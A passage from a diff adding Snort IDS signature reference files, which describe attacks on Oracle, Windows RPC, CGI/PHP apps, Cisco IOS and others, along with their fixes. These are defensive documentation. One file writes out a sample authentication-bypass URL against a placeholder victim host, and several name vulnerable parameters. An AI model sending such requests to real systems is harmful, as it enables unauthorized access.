+http://www.securityfocus.com/bid/6841
+
+--
--- /dev/null
+++ b/doc/signatures/2000.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2000
+
+--
+Summary:
+This event is generated when a remote user attempts to access readmsg.php on a web server. This may indicate an attempt to exploit a directory traversal vulnerability in the WebMail application on Sun Microsystems' Cobalt Qube 3.0 server appliance.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a vulnerability in the WebMail application used by Sun Microsystems' Cobalt Qube 3.0 server appliance. An attacker can use directory traversal techniques when accessing readmsg.php to view hidden files and directories on the web server with the access privileges of the server. 
+
+--
+Affected Systems:
+Any Cobalt Qube 3.0 server appliance running Cobalt Qube Webmail 2.0.1.
+
+--
+Attack Scenarios:
+An attacker can use directory traversal techniques when executing readmsg.php to view directories and files on the Cobalt server.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses readmsg.php, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the newest version of the software. Sun Microsystems has released a patch (Qube3-ml-Security-2.0.1-10626.pkg) that can be downloaded from ftp://ftp.cobalt.com/. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/2987
+
+CVE
+http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CAN-2001-1408
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11073
+
+--
--- /dev/null
+++ b/doc/signatures/304.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid: 304
+
+--
+Summary:
+This event is genereated when an attempt to overflow the buffer of a SCO server is attempted.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to gain remote access to the victim host or execute arbitrary code with the privileges of the superuser account.
+
+--
+Detailed Information:
+Some versions of SCO UNIX Calserver are vulnerable to a buffer overflow condition which can present the attacker with a root shell.
+
+Affected Systems:
+	SCO Internet faststart 1.0, 1.1
+	SCO Open Server 5.0, 5.0.2, 5.0.3 and 5.0.4
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0306
+
+Bugtraq:
+http://www.securityfocus.com/bid/2353
+
+--
--- /dev/null
+++ b/doc/signatures/1516.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1516
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000777.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000777
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "action.php" with SQL commands being passed as the "action" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "action" parameter in the "action.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2244.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2244
+
+--
+Summary:
+This event is generated when an attempt is made to 
+
+--
+Impact:
+Serious. Unauthorized access.
+
+--
+Detailed Information:
+Certain versions of Lucent VitalNet allow access to resources without
+the need for a password.
+
+--
+Affected Systems:
+	Lucent VitalAnalysis 8.0, 8.1, 8.2
+	Lucent VitalEvent 8.0, 8.1, 8.2
+	Lucent VitalHelp 8.0, 8.1, 8.2
+	Lucent VitalNet 8.0, 8.1, 8.2
+	Lucent VitalSuite 8.0, 8.1, 8.2
+
+--
+Attack Scenarios:
+The attacker merely needs to guess a valid username and can gain access
+without the need for a password.
+
+http://victim.foo.com/cgi-bin/VsSetCookie.exe?vsuser=username
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3406.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3406
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000107.txt
@@ -0,0 +1,90 @@
+Rule: 
+
+--
+Sid: 
+100000107
+
+-- 
+Summary: 
+This event is generated when an SQL injection attempt is made against the 
+Microsoft BizTalk Server DTA Interface.
+
+-- 
+
+Impact: 
+Attackers may retreive or modify sensitive in formation stored in the affected 
+database. Additionally, attackers may use the database's functionality to 
+execute arbitrary commands on the system with the priviliges of the user 
+running the script, typically Administrator.
+
+--
+Detailed Information:
+This rule looks specifically for attacks against the RawCustomSearchField.asp 
+module of the DTA Interface which contain the string "exec", which is required 
+to run commands on the host system. Thus, this rule does not detect generic SQL 
+injection attempts, only command execution attempts.
+
+--
+Affected Systems:
+Microsoft BizTalk Server 2000 Developer Edition SP2
+Microsoft BizTalk Server 2000 Developer Edition SP1a
+Microsoft BizTalk Server 2000 Developer Edition
+Microsoft BizTalk Server 2000 Enterprise Edition SP2
+Microsoft BizTalk Server 2000 Enterprise Edition SP1a
+Microsoft BizTalk Server 2000 Enterprise Edition
+Microsoft BizTalk Server 2000 Standard Edition SP2
+Microsoft BizTalk Server 2000 Standard Edition SP1a
+Microsoft BizTalk Server 2000 Standard Edition
+Microsoft BizTalk Server 2002 Developer Edition
+Microsoft BizTalk Server 2002 Enterprise Edition
+
+--
+
+Attack Scenarios: 
+A web browser or a script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as example attacks that can be used with a web browser are publicly 
+available.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Patches which correct this problem are available from Microsoft.com.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+Microsoft BizTalk Server 2000 Enterprise Edition SP2: 
+http://microsoft.com/downloads/details.aspx?FamilyId=001E93E4-0E6E-4289-AEFE-916
+1D2E5AF97&displaylang=en
+Microsoft BizTalk Server 2000 Developer Edition SP2: 
+http://microsoft.com/downloads/details.aspx?FamilyId=001E93E4-0E6E-4289-AEFE-916
+1D2E5AF97&displaylang=en
+Microsoft BizTalk Server 2000 Standard Edition SP2: 
+http://microsoft.com/downloads/details.aspx?FamilyId=001E93E4-0E6E-4289-AEFE-916
+1D2E5AF97&displaylang=en
+
+Microsoft BizTalk Server 2002 Enterprise Edition: 
+http://microsoft.com/downloads/details.aspx?FamilyId=A05344FE-2622-4887-AA45-3DE
+7C4ED3C75&displaylang=en
+
+Microsoft BizTalk Server 2002 Developer Edition: 
+http://microsoft.com/downloads/details.aspx?FamilyId=A05344FE-2622-4887-AA45-3DE
+7C4ED3C75&displaylang=en
+
+-- 
--- /dev/null
+++ b/doc/signatures/119-1.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+119-1
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to evade IDS.
+
+--
+Detailed Information:
+This event indicates that the http_inspect pre-processor has detected
+web traffic containing coded ascii values.
+
+--
+Affected Systems:
+	All web servers.
+
+--
+Attack Scenarios: 
+An attacker may try to encode an attack by using the hexadecimal
+representation of the ascii characters used in an attempt to evade
+detection by IDS.
+
+-- 
+Ease of Attack: 
+Simple
+
+-- 
+
+False Positives:
+These encodings can be relatively prevalent in normal web traffic.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/100000630.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000630
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "review_validate.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"review_validate.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2856.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2856
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure switch_mview_master
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1821.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1821
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in dvips on some RedHat Linux systems.
+
+--
+Impact:
+Execution of commands with the privileges of the lp daemon.
+
+--
+Detailed Information:
+dvips is used to convert DVI documents into PostScript format for
+printing. The line printer daemon may use dvips to print DVI documents
+using a filter.
+
+A configuration error in some distributions of RedHat Linux allows a
+remote attacker to execute commands via this utility.
+
+--
+Affected Systems:
+	RedHat Linux 6.2, 7.0 and 7.1
+
+--
+Attack Scenarios:
+The attacker can place the commands to be excuted in a DVI file and send
+that to the lp daemon.
+
+--
+Ease of Attack:
+Simple. No exploit software is required.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+
+Ensure that dvips is executed in safe mode by the lp daemon by
+specifying the use of the -R flag in the dvi-to-ps.fpi configuration file.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3008.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+3008
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the DELETE command of the IPSwitch IMail IMAP service.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way that the IPSwitch IMail IMAP service
+handles a DELETE command.  An excessively long user-supplied mailbox name
+to be deleted can trigger a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	IPSwitch IMail IMAP4 server 8.13
+
+--
+Attack Scenarios:
+An attacker can supply an overly long mailbox name for deletion, possibly causing
+denial of service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3125.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3125
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1250.txt
@@ -0,0 +1,59 @@
+Rule:
+--
+Sid:
+1250
+
+--
+Summary:
+Attack on Cisco router/switch web interface
+
+--
+Impact:
+Unauthorized administrative access to Cisco devices running vulnerable versions of IOS (router/switch operating system)
+
+--
+Detailed Information:
+Cisco routers and switches running vulnerable IOS versions can be attacked simply by typing in a URL, giving the attacker administrative access to the device.  The device must be running the web configuration interface, a web server that enables a user to configure the device via a web browser.
+
+--
+Affected Systems:
+Cisco routers and switches running affected versions of IOS and whose web management interface is enabled. See http://www.securityfocus.com/bid/2936 
+
+--
+Attack Scenarios:
+Attacker identifies http server running on Cisco switch or router.  Attacker then makes an http connection with the particular URL required to gain administrative control.
+
+--
+Ease of Attack:
+Simple. Web request, no exploit software needed.
+
+--
+False Positives:
+Legitimate access to the configuration manager will generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade IOS to the latest non-affected version.
+
+Apply the appropriate vendor supplied Patches
+
+Disable the web configuration interface.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by James Affeld <jamesaffeld@yahoo.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2936
+
+--
--- /dev/null
+++ b/doc/signatures/2677.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2677
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure instantiate_online
+. This procedure is included in
+dbms_repcat_rgt.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2628.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2628
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "repcat_import_check" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gowner" or "gname"
+variable to cause the overflow. The result could permit the
+attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the
+database with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck90.html
+
+--
--- /dev/null
+++ b/doc/signatures/1244.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1244
+
+--
+Summary:
+This event is generated when an attempt is made to access the .idq Indexing Service ISAPI filter. 
+
+--
+Impact:
+Intelligence gathering activity. If an .idq file is erroneously shared from a network share, an error message is returned from a request that contains the share path will be disclosed.
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) installs several Internet Service Application Programming Interface (ISAPI) extensions.  The .idq ISAPI filter provides support for Internet Data Queries.  Files with the .idq suffix should not be located on network shares.  If an attempt is made to access them from a network share, an error message is returned disclosing the share path.  
+
+--
+Affected Systems:
+Hosts running IIS 4.0
+Hosts running IIS 5.0
+
+--
+Attack Scenarios:
+An attacker can attempt to access a file with the .idq suffix in an attempt to receive an error message with disclosure about the share path.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Do not place files with the .idq suffix on a network share.
+ 
+
+--
+Contributors:
+Original rule written by Dr SuSE and C. Mayor 
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS552
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0071
+
+
+--
--- /dev/null
+++ b/doc/signatures/1201.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+1201
+
+--
+Summary:
+This event is generated when a 403 error response code is returned to a
+client by a webserver.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event is generated when a 403 error response code is returned to a
+client by a webserver. This may indicate an attempt to gain unauthorized
+access to a web server or an application running on a web server.
+
+The 400 series error messages are used to indicate an error on the part
+of the browser client making the request to a web server. The 403
+response indicates a request for a forbidden resource that cannot be
+accessed even with authentication credentials.
+
+Many events may indicate a determined attempt to exploit a vulnerability
+on the victim server.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All web server platforms
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits for  many vulnerabilities exist although no exploit
+code may be required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2565.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2565
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2203.txt
@@ -0,0 +1,55 @@
+Rule:  
+
+--
+Sid:
+2203
+
+--
+Summary:
+This event is generated when an attempt is made to access everythingform.cgi on an internal web server. This may indicate an attempt to exploit a remote command execution vulnerability in Leif M. Wright's everythingform.cgi script.
+
+--
+Impact:
+Remote execution of arbitrary code, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+Leif Wright's everythingform.cgi script is a Perl script that processes multiple forms. It contains a parsing vulnerability in a hidden "config" field that enables an attacker to run arbitrary shell commands with the security context of the web server.
+
+--
+Affected Systems:
+Web servers running Leif M. Wright Everythingform.cgi 2.0.
+--
+Attack Scenarios:
+An attacker uses a specially crafted value for the config field. Any commands included in the value are executed with the security context of the web server.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses everythingform.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable everythingform.cgi. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/2101
+
+--
--- /dev/null
+++ b/doc/signatures/115-2.txt
@@ -0,0 +1,72 @@
+
+
+Rule:
+
+--
+Sid:
+115-2
+
+--
+Summary:
+This event is generated when the pre-processor asn1 detects network
+traffic that may constitute an attack. Specifically an invalid asn.1
+length encoding was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the asn1 pre-processor detects network
+traffic that may consititute an attack.
+
+
+An invalid length parameter in the asn1 packet header may indicate an
+attempt to exploit a vulnerability in the application using asn1
+libraries or alternatively it may be an attempt to evade detection by
+an IDS that may not correctly process asn1 data.
+
